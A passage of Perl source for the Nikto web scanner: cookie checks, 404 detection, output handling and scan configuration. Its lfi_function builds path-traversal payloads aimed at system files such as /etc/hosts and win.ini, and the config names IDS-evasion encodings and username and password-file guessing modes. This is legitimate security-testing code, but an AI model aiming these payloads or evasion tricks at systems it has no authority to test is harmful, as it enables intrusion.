$request,\n                              $response\n                              );\n        }\n\n        # httponly flag\n        if ($c !~ /httponly/i) {\n            add_vulnerability($mark,\n                              $request->{'whisker'}->{'uri'}\n                                . \": Cookie $cname created without the httponly flag\",\n                              000137,\n                              \"https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies\",\n                              $request->{'whisker'}->{'method'},\n                              $request->{'whisker'}->{'uri'},\n                              $request,\n                              $response\n                              );\n        }\n\n        my @ips = get_ips($c);\n\n        if (substr($cname, 0, 4) eq 'NSC_') {\n            push(@ips, decode_netscaler_cookie($cvalue));\n        }\n\n        foreach my $ip (@ips) {\n\n            # This often contains an IP-like string\n            if ($ip eq '1.0.1.1' && $cname eq '__cf_bm') {\n                next;\n            }\n\n            my ($valid, $internal, $loopback) = is_ip($ip);\n            if ($valid && !$loopback) {\n                if ($ip ne $mark->{'ip'}) {\n                    my $msg  = \"\";\n                    my $refs = \"\";\n\n                    if ($cname eq 'ARPT') {\n                        $msg =\n                          \"Cisco content switch reveals internal IP address found in the '$cname' cookie. The IP is \\\"$ip\\\".\";\n                        $refs = \"CVE-2006-4352\";\n                    }\n                    else {\n\n                        # is it an internal, or just different?\n                        my $int;\n                        if ($internal) { $int = \"RFC-1918 \"; }\n                        $msg = $request->{'whisker'}->{'uri'}\n                          . \": ${int}IP address found in the '$cname' cookie. The IP is \\\"$ip\\\".\";\n                    }\n                    add_vulnerability($mark, $msg, 999991, $refs,\n                                      $request->{'whisker'}->{'method'},\n                                      $request->{'whisker'}->{'uri'},\n                                      $request, $response);\n                }\n            }\n        }\n        $CFOUND{$cname}{ $mark->{hostname} } = 1;\n    }\n}\n\nsub decode_netscaler_cookie {\n    my ($cookie_val) = @_;\n    $cookie_val =~ /[0-9a-f]{8}([0-9a-f]{8}).*([0-9a-f]{4})$/;\n    my $ip_value   = hex($1) ^ 0x03081e11;\n    my $port_value = hex($2) ^ 0x3630;\n\n    $ip_hex_str      = sprintf(\"0x%X\", $ip_value);\n    $ip_hex_zero_pad = sprintf(\"%08s\", substr($ip_hex_str, 2, 8));\n    return\n        hex('0x' . substr($ip_hex_zero_pad, 0, 2)) . \".\"\n      . hex('0x' . substr($ip_hex_zero_pad, 2, 2)) . \".\"\n      . hex('0x' . substr($ip_hex_zero_pad, 4, 2)) . \".\"\n      . hex('0x' . substr($ip_hex_zero_pad, 6, 2));\n}\n\n1;\n"
  },
  {
    "path": "program/plugins/nikto_core.plugin",
    "content": "###############################################################################\n# SPDX-License-Identifier: GPL-3.0-only\n# PURPOSE: Nikto core functionality\n###############################################################################\n\nsub change_variables {\n    my ($line, $mark, $checkid, $skip_lfi) = @_;\n\n    # If no mark provided, use global mark\n    $mark = $mark || $::mark;\n\n    # If no variables to expand, check for LFI before returning\n    my $at_index = index($line, '@');\n    if ($at_index == -1) {\n        return ($line);\n    }\n\n    # Use cached $shname for efficiency\n    my $shname = $mark->{'hostname'} || $mark->{'ip'};\n    my @subtests;\n\n    # Replace JUNK(n) with random string\n    $line =~ s/\\@JUNK\\((\\d+)\\)/LW2::utils_randstr($1)/e;\n\n    # Replace static variables\n    $line =~ s/\\@IP/$mark->{'ip'}/g;\n    $line =~ s/\\@HOSTNAME/$shname/g;\n\n    # Phase 1: Expand all non-LFI variables recursively\n    # Keep expanding until no more non-LFI variables remain\n    if (index($line, '@') == -1) {\n        push @subtests, $line;\n    }\n    else {\n        # Check for non-LFI variables and expand them\n        my $found_variable = 0;\n        foreach my $varname (keys %VARIABLES) {\n            next if $varname =~ /^\\@LFI/;\n            next unless index($line, $varname) != -1;\n            if ($line =~ /\\Q$varname\\E/) {\n\n                # Expand this variable: split by whitespace and recursively process each value\n                foreach my $value (split(/\\s+/, $VARIABLES{$varname})) {\n                    my $cooked = $line;\n                    $cooked =~ s/\\Q$varname\\E/$value/g;\n\n          # Recursively expand variables in the cooked line (skip LFI processing in recursive calls)\n                    my @expanded = change_variables($cooked, $mark, $checkid, 1);\n                    push @subtests, @expanded;\n                }\n                $found_variable = 1;\n                last;    # Break out of foreach loop after handling first variable found\n            }\n        }\n        if (!$found_variable) {\n            push(@subtests, $line);\n        }\n    }\n\n    # Phase 2: Handle LFI (only if not skipping)\n    if ($skip_lfi) {\n\n        # In recursive call, just return the subtests without processing LFI\n        return @subtests;\n    }\n\n    # Now that other expansions are done, handle LFI\n    my @tests;\n    foreach my $subtest (@subtests) {\n        if ($subtest =~ /\\@LFI\\(([^)]*)\\)/) {\n            my $args       = $1 || '';\n            my @temp_tests = lfi_function($subtest, $args, $checkid, $mark);\n            push @tests, @temp_tests;\n        }\n        else {\n            push @tests, $subtest;\n        }\n    }\n    return @tests;\n}\n\nsub lfi_function {\n    my ($test, $args, $checkid, $mark) = @_;\n    my @options = split(/,/, $args);\n    my @lfitests;\n\n    # Get detected/forced platform (default to 'all' if not set)\n    my $detected_platform = ($mark && $mark->{'platform'}) ? $mark->{'platform'} : 'all';\n\n    # Determine platform and path settings from test options\n    my $is_nix  = grep(/nix/i, @options);\n    my $is_win  = grep(/win/i, @options);\n    my $use_url = grep(/url/i, @options);\n    my $use_abs = grep(/abs/i, @options);\n\n    # Determine which platforms to generate tests for\n    my @platforms;\n    my $test_specifies_platform = ($is_nix || $is_win);\n\n    if ($test_specifies_platform) {\n\n        # Test explicitly specifies platform(s)\n        # Only run if platform matches or platform is 'all'\n        if ($detected_platform eq 'all') {\n\n            # Platform is 'all' - respect test's specification\n            if ($is_nix && !$is_win) {\n                push @platforms, 'nix';\n            }\n            elsif ($is_win && !$is_nix) {\n                push @platforms, 'win';\n            }\n            else {\n                # Both specified in test - generate both\n                push @platforms, 'nix', 'win';\n            }\n        }\n        elsif (   ($is_nix && $detected_platform eq 'nix')\n               || ($is_win && $detected_platform eq 'win')) {\n\n            # Platform matches test specification - use test's choice\n            if ($is_nix && !$is_win) {\n                push @platforms, 'nix';\n            }\n            elsif ($is_win && !$is_nix) {\n                push @platforms, 'win';\n            }\n            else {\n                # Both specified in test - but only one matches platform\n                push @platforms, $detected_platform;\n            }\n        }\n        else {\n            # Platform doesn't match test specification - return empty (no tests)\n            return @lfitests;    # Return empty array\n        }\n    }\n    else {\n        # Test doesn't specify platform - use detected platform\n        if ($detected_platform eq 'all') {\n            push @platforms, 'nix', 'win';\n        }\n        elsif ($detected_platform eq 'nix') {\n            push @platforms, 'nix';\n        }\n        elsif ($detected_platform eq 'win') {\n            push @platforms, 'win';\n        }\n        else {\n            # Unknown platform, default to both\n            push @platforms, 'nix', 'win';\n        }\n    }\n\n    # Get depth (same for both platforms)\n    my $depth = $VARIABLES{'@LFIDEPTH'} || 5;\n    $depth =~ s/^\\s+|\\s+$//g;\n    $depth = int($depth) if $depth =~ /^\\s*\\d+\\s*$/;\n    $depth = 5           if $depth < 1 || $depth > 20;    # Sanity check\n\n    # Generate tests for each platform\n    foreach my $platform (@platforms) {\n        my $is_nix_platform = ($platform eq 'nix');\n\n        # Get LFI variables (trim whitespace)\n        my $target =\n          $is_nix_platform\n          ? ($VARIABLES{'@LFITGTNIX'} || '/etc/hosts')\n          : ($VARIABLES{'@LFITGTWIN'} || '\\\\Windows\\\\win.ini');\n        $target =~ s/^\\s+|\\s+$//g;\n\n        # Build the full path\n        my $full_path;\n        if ($use_abs) {\n\n            # 'abs' means skip traversal, use absolute path directly\n            $full_path = $target;\n\n            # Ensure it starts with / for nix or \\ for win\n            if ($is_nix_platform) {\n                $full_path = '/' . $full_path unless $full_path =~ /^\\//;\n            }\n            else {\n                # For Windows, ensure it starts with \\ (unless it has a drive letter)\n                $full_path = '\\\\' . $full_path unless $full_path =~ /^[A-Za-z]:|^\\\\/;\n            }\n        }\n        else {\n            # Build traversal sequence\n            my $path =\n              $is_nix_platform\n              ? ($VARIABLES{'@LFIPATHNIX'} || '../')\n              : ($VARIABLES{'@LFIPATHWIN'} || '..\\\\');\n            $path =~ s/^\\s+|\\s+$//g;\n            my $traversal = $path x $depth;\n\n            # Fix double slash if test is exactly @LFI(...)\n            if ($test =~ /^\\@LFI\\([^)]*\\)$/) {\n\n                # Remove trailing / from traversal or leading / from target to avoid //\n                if ($is_nix_platform && $traversal =~ /\\/$/ && $target =~ /^\\//) {\n                    $traversal =~ s/\\/$//;\n                }\n                elsif (!$is_nix_platform && $traversal =~ /\\\\$/ && $target =~ /^\\\\/) {\n                    $traversal =~ s/\\\\$//;\n                }\n            }\n            $full_path = $traversal . $target;\n        }\n\n        # Apply URL encoding if requested (do this after absolute path handling)\n        if ($use_url) {\n            $full_path =~ s/([^A-Za-z0-9])/sprintf(\"%%%02X\", ord($1))/seg;\n        }\n\n        # Replace @LFI(...) in the test string with the generated path\n        my $expanded_test = $test;\n        $expanded_test =~ s/\\@LFI\\([^)]*\\)/$full_path/g;\n\n        push @lfitests, $expanded_test;\n    }\n\n    return @lfitests;\n}\n\n###############################################################################\nsub unslash {\n    my $line = $_[0] || return;    # $line is the slash-escaped variable\n\n    # Early return for empty strings\n    return $line if $line eq '';\n\n    # Use a single regex with eval to handle all escape sequences at once\n    $line =~ s/\\\\([abefnrt])|\\\\x([[:xdigit:]]{2})/defined($1) ? eval(\"qq{\\\\$1}\") : chr(hex($2))/ge;\n\n    return $line;\n}\n###############################################################################\nsub is_404 {\n    my ($mark, $uri, $response) = @_;\n    return 0 unless defined $uri;\n    return 0 unless defined $mark;\n    return 0 unless defined $response;\n    my $debug_404 = 0;\n\n    my $code = $response->{'whisker'}{'code'};\n    if ($debug_404) {\n        print \"--------------------------------\\n\";\n        print \"404: URI is: $uri\\n\";\n        print \"404: URI code is: $code\\n\";\n    }\n\n    # Check user-specified error codes first (highest priority)\n    if (defined $VARIABLES{'ERRCODES'} && ref($VARIABLES{'ERRCODES'}) eq 'HASH') {\n        if (exists $VARIABLES{'ERRCODES'}->{$code}) {\n            print \"404: 1\\n\" if $debug_404;\n            return 1;\n        }\n    }\n\n    # Check user-specified error strings (second priority, before expensive checks)\n    if (defined $VARIABLES{'ERRSTRINGS'} && ref($VARIABLES{'ERRSTRINGS'}) eq 'HASH') {\n        foreach my $pattern (keys %{ $VARIABLES{'ERRSTRINGS'} }) {\n            if ($response->{'content'} =~ /$pattern/) {\n                print \"404: 2\\n\" if $debug_404;\n                return 1;\n            }\n        }\n    }\n\n    # Trust 404, 406, and 410 codes\n    if ($code =~ /^40[46]$/ || $code eq '410') {\n        print \"404: 3\\n\" if $debug_404;\n        return 1;\n    }\n\n    # remove and capture the query string\n    my $query_string = \"\";\n    if ($uri =~ /\\?(.*)$/) {\n        $query_string = $1;\n        $uri =~ s/\\?(.*)$//;\n    }\n    my @uri_parts = split(\"/\", $uri);\n\n    # If we don't have a real path (probably /) just return 0\n    # Filter out empty URI, just \"/\", or all empty parts\n    if ($uri eq \"\" || $uri eq \"/\" || (scalar(@uri_parts) > 0 && !grep { $_ ne \"\" } @uri_parts)) {\n        return 0;\n    }\n\n    my $ext = get_ext($uri);\n\n    # Build base path (all parts except the last one)\n    my @base_parts = @uri_parts;\n    pop @base_parts if scalar(@base_parts) > 0;\n    my $base_path = join(\"/\", @base_parts);\n\n    # Ensure base_path ends with / if it's not empty (for proper path construction)\n    if ($base_path ne \"\" && $base_path ne \"/\") {\n        $base_path .= \"/\";\n    }\n    elsif ($base_path eq \"\") {\n        $base_path = \"/\";\n    }\n\n    # Determine the suffix pattern based on extension type\n    my $suffix_pattern = \"\";\n    if ($ext eq \"DIRECTORY\") {\n        $suffix_pattern = \"/\";\n    }\n    elsif ($ext eq \"DOTFILE\") {\n        $base_path .= \".\";\n    }\n    elsif ($ext eq \"NONE\") {\n    }\n    else {\n        $suffix_pattern = \".\" . $ext;\n    }\n\n    # Build cache key using \"RAND\" placeholder\n    my $cache_key = $base_path . \"RAND\" . $suffix_pattern;\n\n    # Check cache before making request\n    my $cached_entry = $mark->{'nf_cache'}{$cache_key};\n    my ($err_res, $err_content, $err_error, $err_request, $err_response);\n\n    if (defined $cached_entry) {\n        print \"404: Cached Entry\\n\" if $debug_404;\n\n        # Use cached response data\n        $err_res     = $cached_entry->{'code'};\n        $err_content = \"\";                        # Content not cached\n        $err_error   = \"\";\n        $err_request = {};\n        $err_response = {\n                 'code'     => $cached_entry->{'code'},\n                 'location' => exists $cached_entry->{'location'} ? $cached_entry->{'location'} : ''\n                 };\n    }\n    else {\n        print \"404: No Cached Entry\\n\" if $debug_404;\n\n        # Build nf_path by replacing \"RAND\" with actual random string\n        my $rand_str = LW2::utils_randstr(8);\n        my $nf_path  = $base_path . $rand_str . $suffix_pattern;\n        $nf_path .= \"?\" . $query_string if $query_string ne \"\";\n\n        ($err_res, $err_content, $err_error, $err_request, $err_response) =\n          nfetch($mark, $nf_path, \"GET\", \"\", \"\", \"\", \"is_404\");\n\n        # Determine mode, type, match, and location\n        my %response_map = (200 => \"OK\",\n                            300 => \"REDIR\",\n                            301 => \"REDIR\",\n                            302 => \"REDIR\",\n                            303 => \"REDIR\",\n                            307 => \"REDIR\",\n                            401 => \"STD\",\n                            403 => \"STD\",\n                            404 => \"STD\",\n                            406 => \"STD\",\n                            410 => \"STD\"\n                            );\n\n        my $mode = $response_map{$err_res} || \"OTHER\";\n        my $cache_entry = { 'code' => $err_res,\n                            'mode' => $mode\n                            };\n        print \"404: $nf_path returned code: $err_res\\n\" if $debug_404;\n        print \"404: mode is: $mode\\n\"                   if $debug_404;\n\n        # Handle redirects - store location if present\n        if ($err_response && $err_response->{'location'} ne '') {\n            $cache_entry->{'location'} = get_base_host($err_response->{'location'});\n        }\n\n        # Only determine type for OK/OTHER modes (STD and REDIR don't need type)\n        if ($mode eq \"OK\" || $mode eq \"OTHER\") {\n            if (length($err_content) == 0) {\n                print \"404: Type is BLANK\\n\" if $debug_404;\n                $cache_entry->{'type'}  = \"BLANK\";\n                $cache_entry->{'match'} = \"\";\n            }\n            else {\n                print \"404: Type is HASH\\n\" if $debug_404;\n                $cache_entry->{'type'}  = \"HASH\";\n                $cache_entry->{'match'} = LW2::md5(rm_active_content($err_content, $nf_path));\n                print \"404: Match is: $cache_entry->{'match'}\\n\" if $debug_404;\n            }\n        }\n\n        # Store in cache\n        $mark->{'nf_cache'}{$cache_key} = $cache_entry;\n    }\n\n    # Now determine if the actual response matches the \"not found\" pattern\n    # Get the cached entry (should always be defined at this point)\n    my $nf_entry = $mark->{'nf_cache'}{$cache_key};\n    return 0 unless defined $nf_entry;\n\n    my $nf_mode         = $nf_entry->{'mode'};\n    my $actual_code     = $response->{'whisker'}{'code'};   # From the actual response being checked\n    my $actual_content  = $response->{'whisker'}{'data'} || \"\";\n    my $actual_location = $response->{'location'}        || \"\";\n\n    # Check STD mode first (most common case - fastest check)\n    if ($nf_mode eq \"STD\") {\n        if ($actual_code =~ /^4\\d\\d$/) {\n            print \"404: 4\\n\" if $debug_404;\n            return 1;\n        }\n        return 0;\n    }\n\n    # Check REDIR mode\n    if ($nf_mode eq \"REDIR\") {\n        if ($actual_location ne '' && exists $nf_entry->{'location'}) {\n            my $actual_base = get_base_host($actual_location);\n            if ($actual_base eq $nf_entry->{'location'}) {\n                print \"404: 5\\n\" if $debug_404;\n                return 1;\n            }\n        }\n        return 0;\n    }\n\n    # Check BLANK type (for OK/OTHER modes)\n    if (exists $nf_entry->{'type'} && $nf_entry->{'type'} eq \"BLANK\") {\n        if (length($actual_content) == 0) {\n            print \"404: 6\\n\" if $debug_404;\n            return 1;\n        }\n        return 0;\n    }\n\n    # Check HASH type (most expensive, check last)\n    if (exists $nf_entry->{'type'} && $nf_entry->{'type'} eq \"HASH\") {\n        print \"404: Checking HASH type\\n\"                     if $debug_404;\n        print \"404: nf_entry hash is: $nf_entry->{'match'}\\n\" if $debug_404;\n        if (exists $nf_entry->{'match'} && $nf_entry->{'match'} ne '') {\n            print \"404: in exists\\n\" if $debug_404;\n\n            if (length($actual_content) > 0) {\n                print \"404: length is > 0\\n\" if $debug_404;\n                my $clean_content = rm_active_content($actual_content, $uri);\n                print \"404: Hash comparison is: \\n\"            if $debug_404;\n                print \"    \" . LW2::md5($clean_content) . \"\\n\" if $debug_404;\n                print \"    \" . $nf_entry->{'match'} . \"\\n\"     if $debug_404;\n                if (LW2::md5($clean_content) eq $nf_entry->{'match'}) {\n                    print \"404: 7\\n\" if $debug_404;\n                    return 1;\n                }\n            }\n            else { print \"length is 0\\n\" if $debug_404; }\n        }\n        print \"404: 8\\n\" if $debug_404;\n        return 0;\n    }\n\n    # If we get here, the cached entry doesn't match any known pattern\n    print \"404: 9\\n\" if $debug_404;\n    return 0;\n}\n\n###############################################################################\nsub scrub {\n\n    # line to scrub\n    my $line = shift;\n\n    for my $val (@_) {\n        next if $val eq \"\";\n\n        # Create a copy to avoid modifying read-only values\n        my $val_copy = $val;\n\n        # remove IPv6 brackets if present\n        $val_copy =~ s/^\\[([^\\]]+)\\]$/$1/;\n        $val_copy = validate_and_fix_regex($val_copy);\n\n        my ($validip, $internal, $loopback) = is_ip($val_copy);\n        if ($validip) {\n            if ($val_copy =~ /^$LW2::IPv6_re$/) {\n                $line =~ s/$val_copy/\\:\\:/g;\n            }\n            else {\n                $line =~ s/$val_copy/0.0.0.0/g;\n            }\n        }\n        else {\n            $line =~ s/$val_copy/example.com/ig;\n        }\n    }\n\n    return $line;\n}\n\n###############################################################################\nsub nprint {\n    my ($line, $mode, $testid) = @_;\n    chomp($line);\n\n    # Deferred output?\n    if ($VARIABLES{'deferout'}) {\n        push @{ $VARIABLES{'defertxt'} }, $mode . \"::\" . ($testid // '') . \"::\" . $line;\n        return;\n    }\n\n    # scrub values - only pass scrub values (everything after $line and $mode)\n    if ($OUTPUT{'scrub'}) {\n        my @scrub_values = @_[ 3 .. $#_ ];\n        $line = scrub($line, @scrub_values);\n    }\n\n    # don't print debug & verbose to output file...\n    if ($mode ne '') {\n        my %output_flags = ('d' => 'debug', 'v' => 'verbose', 'e' => 'errors');\n\n        if (exists $output_flags{$mode} && $OUTPUT{ $output_flags{$mode} }) {\n            my $prefix     = $mode eq 'd'    ? \"D:\"        : $mode eq 'v' ? \"V:\" : \"E:\";\n            my $output     = $mode eq 'd'    ? \\*STDERR    : \\*STDOUT;\n            my $testid_str = defined $testid ? \"[$testid]\" : \"[000000]\";\n            print $output $prefix . localtime() . \" $testid_str - $line\\n\";\n        }\n        return;\n    }\n\n    # print errors to STDERR\n    if ($line =~ /^\\t?\\+ ERROR:/) { print STDERR \"$line\\n\"; return; }\n\n    # don't print to STDOUT if output file is \"-\"\n    return if defined $CLI{'file'} && $CLI{'file'} eq \"-\";\n\n    $line =~\n      s/(CVE\\-[12][0-9]{3}-[0-9]{4,5})/https:\\/\\/cve.mitre.org\\/cgi-bin\\/cvename.cgi?name\\=$1/g;\n    $line =~ s/(CA\\-[12][0-9]{3}-[0-9]{2})/https:\\/\\/www.cert.org\\/advisories\\/$1.html/g;\n    $line =~\n      s/(MS([0-9]{2})\\-[0-9]{3})/https\\:\\/\\/docs\\.microsoft\\.com\\/en-us\\/security-updates\\/securitybulletins\\/20$2\\/$1/gi;\n\n    print $line . \"\\n\";\n\n    return;\n}\n\n###############################################################################\nsub get_ext {\n    my $uri = $_[0] || return;\n    return \"DIRECTORY\" if $uri =~ /\\/$/;\n    $uri                       =~ s/^.*\\///;\n    return \"DOTFILE\" if $uri   =~ /^\\.[^.%]/;\n    $uri                       =~ s/[?&%;\\|].*$//;\n    return \"NONE\" if index($uri, '.') == -1;\n    $uri =~ s/\\@[A-Z]+(\\([^\\)]*\\))?//;    # remove variables and functions\n    $uri =~ s/\".*$//;\n    $uri =~ s/^.*\\.//;\n    return $uri;\n}\n\n###############################################################################\nsub status_report {\n    my ($mark) = shift;\n    my $line;\n\n    # without this we could face a div by 0 error\n    if (   $COUNTERS{'totalrequests'} eq 0\n        || $COUNTERS{'total_checks'} eq 0\n        || $COUNTERS{'total_targets'} eq 0) {\n        nprint(\"- STATUS: Starting up!\");\n        return;\n    }\n\n    my $secleft =\n      ((time() - $COUNTERS{'scan_start'}) / $COUNTERS{'totalrequests'}) *\n      (($COUNTERS{'total_checks'} * $COUNTERS{'total_targets'}) - $COUNTERS{'totalrequests'});\n    my $timeleft;\n    if ($secleft > 60) {\n        my $minleft = $secleft / 60;\n        $timeleft = sprintf(\"%.1f minutes\", $minleft);\n        if ($minleft > 60) {\n            my $hrsleft = $minleft / 60;\n            $timeleft = sprintf(\"%.1f hours\", $hrsleft);\n        }\n    }\n    else { $timeleft = sprintf(\"%.0f seconds\", $secleft); }\n\n    my $perc_compl =\n      ($COUNTERS{'totalrequests'} / ($COUNTERS{'total_checks'} * $COUNTERS{'total_targets'}) * 100);\n\n    $line = \"- STATUS: Completed $COUNTERS{'totalrequests'} requests\";\n    if ($COUNTERS{'total_targets'} > 1) {\n        $line .= \" (target \" . ($COUNTERS{'hosts_completed'} + 1) . \"/$COUNTERS{'total_targets'})\";\n    }\n\n    if (($perc_compl < 100) && ($secleft > 0)) {\n        $line .= sprintf(\" (~%.0f%% complete, ~$timeleft left)\", $perc_compl);\n    }\n\n    if ($NIKTO{'current_plugin'} ne '') {\n        $line .= \": currently in plugin '$NIKTO{'current_plugin'}'\";\n    }\n\n    nprint($line);\n    nprint(\"- STATUS: \" . running_average_print($mark));\n\n    return;\n}\n###############################################################################\nsub date_disp {\n    my $t      = $_[0] || return;\n    my @time   = localtime($t);\n    my $result = sprintf(\"%d-%02d-%02d %02d:%02d:%02d\",\n                         $time[5] + 1900,\n                         $time[4] + 1,\n                         $time[3], $time[2], $time[1], $time[0]);\n    return $result;\n}\n\n###############################################################################\nsub get_base_host {\n    my $uri = $_[0] || return;\n\n    # uri, protocol, host, port, params, frag, user, password.\n    my @hd   = LW2::uri_split($uri);\n    my $base = $hd[1] . \"://\" . $hd[2];\n    if (($hd[3] != 80) && ($hd[3] != 443)) { $base .= \":\" . $hd[3]; }\n    $base .= \"/\";\n    return $base;\n}\n\n###############################################################################\nsub rm_active_content {\n\n    # Try to remove active content which could mess up the file's signature\n    my ($cont, $file) = @_;\n    return \"\" if (length($cont) == 0);\n\n    # Dates/Times\n    $cont =~ s/[12]\\d{3}[-.\\/][1-3]?\\d[-.\\/][1-3]?\\d//g;      # 2001-12-12\n    $cont =~ s/[1-3]?\\d[-.\\/][1-3]?\\d\\d[-.\\/][12]\\d{3}//g;    # 12-12-2002\n    $cont =~ s/\\d{8,14}//g;                                   # timestamp\n    $cont =~ s/\\d{6}//g;                                      # timestamp\n    $cont =~ s/\\d{2}:\\d{2}(?::\\d{2})?//g;                     # 12:11:33\n    $cont =~\n      s/(?:mon|tue|wed|thu|fri|sat|sun)(?:day)?,? [1-3]?[0-9] (?:jan|feb|mar|apr|may|jun|jul|aug|sep|oct|nov|dec)//ig;\n    $cont =~ s/[12][0-9]{3}\\s?(?:jan|feb|mar|apr|may|jun|jul|aug|sep|oct|nov|dec)\\s?[1-3]?[0-9]//gi\n      ;                                                       # 2009 jan 29\n    $cont =~\n      s/[1-3]?[0-9]\\s?(?:jan|feb|mar|apr|may|jun|jul|aug|sep|oct|nov|dec)[, ]?(?:[12][0-9]{3})?//gi\n      ;                                                       # 29 Jan 2009\n    $cont =~ s/[\\d.]+ (?:second|queries)//gi;                 # page load time\n\n    # URI, if provided, plus encoded versions of it\n    # $_[1] has unescaped file name, and $file has escaped. use appropriate one!\n    if ($file ne '') {\n        $file = quotemeta($file);\n        $cont =~ s/$file//g;\n\n        # base 64\n        my $e = LW2::encode_base64($_[1]);\n        $cont =~ s/$e//gs;\n\n        # hex encoded\n        $e = LW2::encode_uri_hex($_[1]);\n        $cont =~ s/$e//gs;\n\n        # unicode encoded\n        $e = LW2::encode_unicode($_[1]);\n        $e = quotemeta($e);\n        $cont =~ s/$e//gs;\n\n        # url encoding, full url\n        $e = $_[1];\n        $e    =~ s/([^A-Za-z0-9])/sprintf(\"%%%02X\", ord($1))/seg;\n        $cont =~ s/$e//gs;\n\n        # url encoding, query portion\n        if ($file =~ /\\?(.*$)/) {\n            my $qs = $1;\n\n            # match pages which link to themselves w/diff args\n            $cont =~ s/$qs//gs;\n\n            # url encoded\n            $qs   =~ s/([^A-Za-z0-9])/sprintf(\"%%%02X\", ord($1))/seg;\n            $cont =~ s/$qs//gs;\n        }\n    }\n\n    return $cont;\n}\n\n###############################################################################\nsub dump_target_info {\n    my ($mark) = @_;\n    my $sslprint = \"\";\n\n    if ($mark->{ssl}) {\n\n        $sslprint = \"$VARIABLES{'DIV'}\\n\";\n        $sslprint .= \"+ SSL Info:           Subject:  $mark->{'ssl_cert_subject'}\\n\";\n\n        # Extract and display CN separately\n        my $cn = '';\n        if ($mark->{'ssl_cert_subject'} =~ /CN=([^$ \\/]+)/) {\n            $cn = $1;\n            $sslprint .= \"                      CN:       $cn\\n\";\n        }\n\n        # Display SAN if present\n        if ($mark->{'ssl_cert_altnames'} ne '') {\n            $sslprint .= \"                      SAN:      $mark->{'ssl_cert_altnames'}\\n\";\n        }\n\n        $sslprint .= \"                      Ciphers:  $mark->{'ssl_cipher'}\\n\";\n        $sslprint .= \"                      Issuer:   $mark->{'ssl_cert_issuer'}\";\n    }\n\n    if ($CLI{'plugins'} ne '@@NONE') {\n        if ($mark->{ip} =~ /^$LW2::IPv4_re$/ || $mark->{ip} =~ /^$LW2::IPv6_re_inc_zoneid$/) {\n            nprint(\"+ Target IP:          $mark->{ip}\", \"\", ($mark->{'ip'}));\n        }\n        else {\n            nprint(\"+ Target IP:          (proxied)\", \"\", ($mark->{'ip'}));\n        }\n\n        nprint(\"+ Target Hostname:    $mark->{hostname}\",\n               \"\", ($mark->{'hostname'}, $mark->{'ip'}, $mark->{'displayname'}));\n        nprint(\"+ Target Port:        $mark->{port}\");\n        if (defined $CLI{'root'}) {\n            nprint(\"+ Target Path:        $CLI{'root'}\",\n                   \"\", ($mark->{'hostname'}, $mark->{'ip'}, $mark->{'displayname'}));\n        }\n\n        if ((defined $CLI{'vhost'}) && ($CLI{'vhost'} ne $mark->{hostname})) {\n            nprint(\"+ Virtual Host:       $CLI{'vhost'}\",\n                   \"\", ($mark->{'hostname'}, $mark->{'ip'}, $mark->{'displayname'}));\n        }\n\n        if ($request{'whisker'}->{'proxy_host'} ne '') {\n            nprint(\n                \"+ Proxy:              $request{'whisker'}->{'proxy_host'}:$request{'whisker'}->{'proxy_port'}\",\n                \"\",\n                ($mark->{'hostname'}, $mark->{'ip'}, $mark->{'displayname'})\n                );\n        }\n\n        if ($mark->{ssl}) {\n            nprint($sslprint, \"\", ($mark->{'hostname'}, $mark->{'ip'}, $mark->{'displayname'}));\n        }\n\n        if (defined $NIKTO{'anti_ids'} && defined $CLI{'evasion'}) {\n            for (my $i = 1 ; $i <= (keys %{ $NIKTO{'anti_ids'} }) ; $i++) {\n                if ($CLI{'evasion'} =~ /$i/) {\n                    nprint(\"+ Using Encoding:     $NIKTO{'anti_ids'}{$i}\");\n                }\n            }\n        }\n        if (defined $NIKTO{'mutate_opts'} && defined $CLI{'mutate'}) {\n            for (my $i = 1 ; $i <= (keys %{ $NIKTO{'mutate_opts'} }) ; $i++) {\n                if ($CLI{'mutate'} =~ /$i/) {\n                    nprint(\"+ Using Mutation:     $NIKTO{'mutate_opts'}{$i}\");\n                }\n            }\n        }\n\n        if (defined $mark->{'messages'}) {\n            my @msgs = @{ $mark->{'messages'} };\n            foreach my $m (@msgs) {\n                nprint(\"+ Message:            $m\",\n                       \"\", ($mark->{'hostname'}, $mark->{'ip'}, $mark->{'displayname'}));\n            }\n        }\n\n        if (defined $mark->{'platform'}) {\n            my %platform_names = ('nix' => 'Linux/Unix',\n                                  'win' => 'Windows',\n                                  'all' => 'Unknown'\n                                  );\n            my $platform_display = $platform_names{ $mark->{'platform'} } || $mark->{'platform'};\n            nprint(\"+ Platform:           $platform_display\");\n        }\n\n        my $time = date_disp($mark->{start_time});\n        nprint(\"+ Start Time:         $time (GMT$VARIABLES{'GMTOFFSET'})\");\n        nprint($VARIABLES{'DIV'});\n    }\n\n    if ($mark->{banner} ne \"\") {\n        nprint(\"+ Server: $mark->{banner}\",\n               \"\", ($mark->{'hostname'}, $mark->{'ip'}, $mark->{'displayname'}));\n    }\n    else {\n        nprint(\"+ Server: No banner retrieved\");\n    }\n\n    return;\n}\n\n###############################################################################\nsub general_config {\n    ## gotta set these first\n    $| = 1;\n\n    # internal array, this should never be used outside this sub\n    my @options;\n\n    # This is used in dump_target_info(), not just help output\n    $NIKTO{'anti_ids'}{'1'} = \"Random URI encoding (non-UTF8)\";\n    $NIKTO{'anti_ids'}{'2'} = \"Directory self-reference (/./)\";\n    $NIKTO{'anti_ids'}{'3'} = \"Premature URL ending\";\n    $NIKTO{'anti_ids'}{'4'} = \"Prepend long random string\";\n    $NIKTO{'anti_ids'}{'5'} = \"Fake parameter\";\n    $NIKTO{'anti_ids'}{'6'} = \"TAB as request spacer\";\n    $NIKTO{'anti_ids'}{'7'} = \"Change the case of the URL\";\n    $NIKTO{'anti_ids'}{'8'} = \"Use Windows directory separator (\\\\)\";\n    $NIKTO{'anti_ids'}{'A'} = \"Use a carriage return (0x0d) as a request spacer\";\n    $NIKTO{'anti_ids'}{'B'} = \"Use binary value 0x0b as a request spacer\";\n\n    # This is used in dump_target_info(), not just help output\n    $NIKTO{'mutate_opts'}{'1'} = \"Test all files with all root directories\";\n    $NIKTO{'mutate_opts'}{'2'} = \"Guess for password file names\";\n    $NIKTO{'mutate_opts'}{'3'} = \"Enumerate user names via Apache (/~user type requests)\";\n    $NIKTO{'mutate_opts'}{'4'} =\n      \"Enumerate user names via cgiwrap (/cgi-bin/cgiwrap/~user type requests)\";\n    $NIKTO{'mutate_opts'}{'6'} =\n      \"Attempt to guess directory names from the supplied dictionary file\";\n\n    ### CLI STUFF\n    $CLI{'pause'} = $CLI{'html'} = 